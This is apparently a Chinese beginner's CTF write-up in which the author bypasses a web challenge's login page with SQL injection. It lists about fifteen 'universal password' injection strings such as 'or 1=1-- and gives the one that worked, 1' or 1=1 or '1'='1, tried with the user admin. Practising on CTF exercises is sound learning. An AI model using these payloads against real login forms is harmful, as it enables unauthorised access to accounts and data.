Document

在做web题的时候我个人喜欢用kali做，因为kali集成了很多有用的渗透工具，很方便。我喜欢用BP去加以辅助。抓包改包来看回显，以及需要爆破的时候BP都是很有用的工具：

通过给的IP我们看到一个有登录框的页面：

 f12看看网站源码没发现什么东西：

 看到个check.php猜测应该是PHP代码写的链接数据库。我们猜测可以用万能密码，我所收集的万能密码有如下：

"or "a"="a
')or('a'='a
 or 1=1--
 'or 1=1--
 a'or' 1=1--
 "or 1=1--
 'or'a'='a
 "or"="a'='a
 'or''='
 'or'='or'
 1 or '1'='1'=1
 1 or '1'='1' or 1=1
 'OR 1=1%00
 "or 1=1%00
 'xor

尝试过后发现并不能进去，这时候我又想到爆破，逐一排查，但这题似乎并不是这么解的。还是得利用sql语句拼接。由于我对sql语句的不熟悉，并不知道如何拼接，于是我查阅资料，找到了另外一个万能密码1' or 1=1 or '1'='1，于是我用admin用户去尝试：

 成功得到flag：

 这题很简单，只需要知道题目考察的是sql注入，接着想到万能密码拼接就能做出来，下来我需要补充我的sql语句的知识，在不断的做题过程中成长。